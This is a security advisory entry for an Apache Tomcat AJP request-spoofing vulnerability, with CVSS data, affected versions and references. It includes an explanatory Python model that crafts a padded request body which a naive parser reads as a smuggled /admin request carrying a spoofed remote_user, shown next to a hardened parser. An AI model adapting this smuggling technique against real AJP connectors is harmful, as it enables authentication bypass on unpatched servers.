CVSS2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
EPSS Percentile: 85.4%
Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
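The mechanism in the description, as an added example that is not part of this advisory, of Tomcat's source, or of the referenced bug report: a constructed Python model of AJP13 framing with a vulnerable and a hardened receiver. In AJP13 every packet from the web server carries the magic bytes 0x12 0x34 and a 2-byte length; a Forward Request payload starts with prefix code 2, while a request body chunk payload starts with a 2-byte data length and has no prefix byte at all. A receiver that dispatches each packet on its first payload byte without remembering that a body chunk is still owed can be made to parse attacker-supplied body bytes as a new Forward Request, including the remote_user attribute the front end uses to hand over an already authenticated identity. The hardened receiver keeps that state and consumes the chunk as opaque data. The function names, the sample request fields and the padded body are assumptions for the model; it does not reproduce the exact conditions under which the affected Tomcat connectors failed.

```python
import struct
# Constructed, simplified model of AJP13 framing; not Tomcat's connector code.
AJP_MAGIC = b"\x12\x34"                 # web server -> container packet magic
PREFIX_FORWARD_REQUEST = 2              # JK_AJP13_FORWARD_REQUEST
METHOD_CODES = {"OPTIONS": 1, "GET": 2, "HEAD": 3, "POST": 4}
ATTR_REMOTE_USER, ATTR_TERMINATOR = 0x03, 0xFF   # remote_user attribute code, attribute list end
HDR_CONTENT_LENGTH = 0xA008             # SC_REQ_CONTENT_LENGTH coded header name

def ajp_string(s):
    """AJP string: 2-byte length, bytes, NUL terminator (0xFFFF encodes null)."""
    if s is None:
        return b"\xff\xff"
    return struct.pack(">H", len(s.encode())) + s.encode() + b"\x00"

def forward_request(method, uri, headers=None, attributes=None):
    """Payload (without magic/length) of a Forward Request; single-value attributes only."""
    p = bytes([PREFIX_FORWARD_REQUEST, METHOD_CODES[method]]) + ajp_string("HTTP/1.1") + ajp_string(uri)
    p += ajp_string("127.0.0.1") + ajp_string("localhost") + ajp_string("localhost")  # remote_addr, remote_host, server_name
    p += struct.pack(">H", 8080) + b"\x00"                                            # server_port, is_ssl
    p += struct.pack(">H", len(headers or {}))
    for name, value in (headers or {}).items():
        coded = struct.pack(">H", HDR_CONTENT_LENGTH) if name == "Content-Length" else ajp_string(name)
        p += coded + ajp_string(value)
    for code, value in (attributes or {}).items():
        p += bytes([code]) + ajp_string(value)
    return p + bytes([ATTR_TERMINATOR])

def packet(payload):
    return AJP_MAGIC + struct.pack(">H", len(payload)) + payload

def body_packet(data):
    """Body chunk payload: 2-byte data length then the data; there is no prefix byte."""
    return packet(struct.pack(">H", len(data)) + data)

def read_string(buf, pos):
    n = struct.unpack(">H", buf[pos:pos + 2])[0]
    if n == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + n].decode(errors="replace"), pos + 3 + n

def parse_forward_request(payload):
    method, pos = payload[1], 2
    _, pos = read_string(payload, pos)                     # protocol
    uri, pos = read_string(payload, pos)
    for _ in range(3):                                     # remote_addr, remote_host, server_name
        _, pos = read_string(payload, pos)
    pos += 3                                               # server_port (2) + is_ssl (1)
    num_headers, pos = struct.unpack(">H", payload[pos:pos + 2])[0], pos + 2
    headers, attrs = {}, {}
    for _ in range(num_headers):
        if payload[pos] == 0xA0:                           # coded header name
            code, pos = struct.unpack(">H", payload[pos:pos + 2])[0], pos + 2
            name = "Content-Length" if code == HDR_CONTENT_LENGTH else "sc-%04x" % code
        else:
            name, pos = read_string(payload, pos)
        headers[name], pos = read_string(payload, pos)
    while pos < len(payload) and payload[pos] != ATTR_TERMINATOR:
        code, pos = payload[pos], pos + 1
        attrs[code], pos = read_string(payload, pos)
    return {"method": method, "uri": uri, "headers": headers, "attrs": attrs}

def split_packets(stream):
    pos = 0
    while pos < len(stream):
        assert stream[pos:pos + 2] == AJP_MAGIC, "bad magic at offset %d" % pos
        n = struct.unpack(">H", stream[pos + 2:pos + 4])[0]
        yield stream[pos + 4:pos + 4 + n]
        pos += 4 + n

def vulnerable_receiver(stream):
    """Dispatches every packet on its first payload byte, even when a body chunk is still owed."""
    return [("request", parse_forward_request(p)) if p[0] == PREFIX_FORWARD_REQUEST else ("other", p[0])
            for p in split_packets(stream)]

def hardened_receiver(stream):
    """Consumes the chunk owed after a request with Content-Length > 0 as opaque body data, so a
    body is never dispatched as a request (multi-chunk bodies via GET_BODY_CHUNK not modelled)."""
    out, expecting_body = [], False
    for payload in split_packets(stream):
        if expecting_body:
            n = struct.unpack(">H", payload[:2])[0]
            out.append(("body", payload[2:2 + n]))
            expecting_body = False
        elif payload[0] == PREFIX_FORWARD_REQUEST:
            req = parse_forward_request(payload)
            out.append(("request", req))
            expecting_body = int(req["headers"].get("Content-Length", "0")) > 0
        else:
            out.append(("other", payload[0]))
    return out

def demo():
    """Constructed traffic: a POST to /public whose body is shaped like a Forward Request for /admin
    with a spoofed remote_user; padded to 0x0202 bytes so the body length reads as prefix 2, method 2 (GET)."""
    smuggled = forward_request("GET", "/admin", attributes={ATTR_REMOTE_USER: "admin"})[2:]
    smuggled += b"\x00" * (0x0202 - len(smuggled))       # padding after the terminator is ignored
    post = packet(forward_request("POST", "/public", headers={"Content-Length": str(len(smuggled))}))
    return vulnerable_receiver(post + body_packet(smuggled)), hardened_receiver(post + body_packet(smuggled))
```

Calling demo() returns, for the vulnerable receiver, two requests (the second for /admin with remote_user set to admin, never sent by the front end) and, for the hardened receiver, one request followed by one opaque 514-byte body. The padding step is what makes the model work: the chunk's own length field is the only thing the misreading receiver sees as a prefix, so the attacker picks a body size whose high byte is 2. Independently of any fix, AJP trusts the front end for remote_user and similar attributes, so the connector should be reachable only from the reverse proxy (firewalled or bound to the address the proxy uses), never from the network at large.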
Vendor | Product | Version | CPE |
---|---|---|---|
apache | tomcat | 7.0.0 | cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* |
apache | tomcat | 7.0.0 | cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:* |
apache | tomcat | 7.0.1 | cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:* |
apache | tomcat | 7.0.2 | cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:* |
apache | tomcat | 7.0.3 | cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:* |
apache | tomcat | 7.0.4 | cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:* |
apache | tomcat | 7.0.5 | cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:* |
apache | tomcat | 7.0.6 | cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:* |
apache | tomcat | 7.0.7 | cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:* |
apache | tomcat | 7.0.8 | cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:* |
marc.info/?l=bugtraq&m=132215163318824&w=2
marc.info/?l=bugtraq&m=133469267822771&w=2
marc.info/?l=bugtraq&m=136485229118404&w=2
marc.info/?l=bugtraq&m=139344343412337&w=2
secunia.com/advisories/45748
secunia.com/advisories/48308
secunia.com/advisories/49094
secunia.com/advisories/57126
securityreason.com/securityalert/8362
www.debian.org/security/2012/dsa-2401
www.mandriva.com/security/advisories?name=MDVSA-2011:156
www.securityfocus.com/archive/1/519466/100/0/threaded
www.securityfocus.com/bid/49353
www.securitytracker.com/id?1025993
exchange.xforce.ibmcloud.com/vulnerabilities/69472
issues.apache.org/bugzilla/show_bug.cgi?id=51698
lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E
lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14933
oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19465